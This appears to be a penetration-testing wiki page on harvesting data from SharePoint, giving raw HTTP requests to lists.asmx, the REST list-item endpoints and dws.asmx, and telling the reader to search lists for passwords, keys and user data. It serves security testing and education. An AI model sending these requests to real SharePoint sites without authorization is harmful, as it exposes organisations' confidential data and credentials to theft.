exploit/technologies

CMS

SharePoint

Lists

Lists in SharePoint are used to organize and manage data like documents, tasks, and events. If not properly secured, they can expose sensitive information. Services like Lists.asmx enable interaction with these lists, allowing unauthorized access, modification, or deletion of data if permission controls are weak.

Retrieve all available lists

POST /_vti_bin/lists.asmx HTTP/2
Host: example.com
Cookie: ...
Content-Type: text/xml; charset=utf-8
Content-Length: 341
Soapaction: "http://schemas.microsoft.com/sharepoint/soap/GetListCollection"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetListCollection xmlns="http://schemas.microsoft.com/sharepoint/soap/" />
  </soap:Body>
</soap:Envelope>

Retrieve items from a specific list (by title)

GET /_api/web/lists/GetByTitle('LIST_NAME')/items HTTP/2
Host: example.com

Note: If the list title contains spaces, replace them with %20 (e.g., GetByTitle('My%20List')).

Retrieve items from a specific list (by guid)

GET /sites/CDICV/_api/web/Lists(guid'GUID')/items HTTP/2
Host: example.com

When retrieving items from SharePoint lists, be sure to look for lists or items that might contain sensitive data such as passwords, keys, emails, users, etc.

Additional List Information Endpoints

Endpoint

Description

/_api/Web/Lists(guid'GUID')/ContentTypes

Access the content types used by the list.

/_api/Web/Lists(guid'GUID')/Fields

Retrieve the fields (columns) and their properties from the list.

/_api/Web/Lists(guid'GUID')/Items(ID)/FieldValuesForEdit

Retrieve field values of a list item in an editable format.

/_api/Web/Lists(guid'GUID')/Items(ID)/FieldValuesAsText

Get the field values of a list item as plain text.

/_api/Web/Lists(guid'GUID')/Items(ID)/AttachmentFiles

Access the attachment files associated with a list item.

/_api/Web/Lists(guid'GUID')/Items(ID)/Folder

Retrieve folder information for the list item, if applicable.

/_api/Web/Lists(guid'GUID')/Items(ID)/RoleAssignments

Get the role assignments (permissions) for the list item.

Data Warehouse Service (`dws.asmx`)

The dws.asmx file is a web service in SharePoint used for data integration. If not properly secured, it can expose user information (such as account identifiers) and session cookies. An attacker could intercept or manipulate requests, gaining unauthorized access to this sensitive data

POST /_vti_bin/dws.asmx HTTP/2
Host: example.com
Content-Type: text/xml; charset=utf-8
Content-Length: 384
Cookie: Healthy
Soapaction: "http://schemas.microsoft.com/sharepoint/soap/dws/GetDwsData"
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetDwsData xmlns="http://schemas.microsoft.com/sharepoint/soap/dws/">
      <document></document>
    </GetDwsData>
  </soap:Body>
</soap:Envelope>

Previousrecon/technologies Nexttools/hydra

Last updated 6 months ago

CMS

SharePoint

Lists

Data Warehouse Service (dws.asmx)

Data Warehouse Service (`dws.asmx`)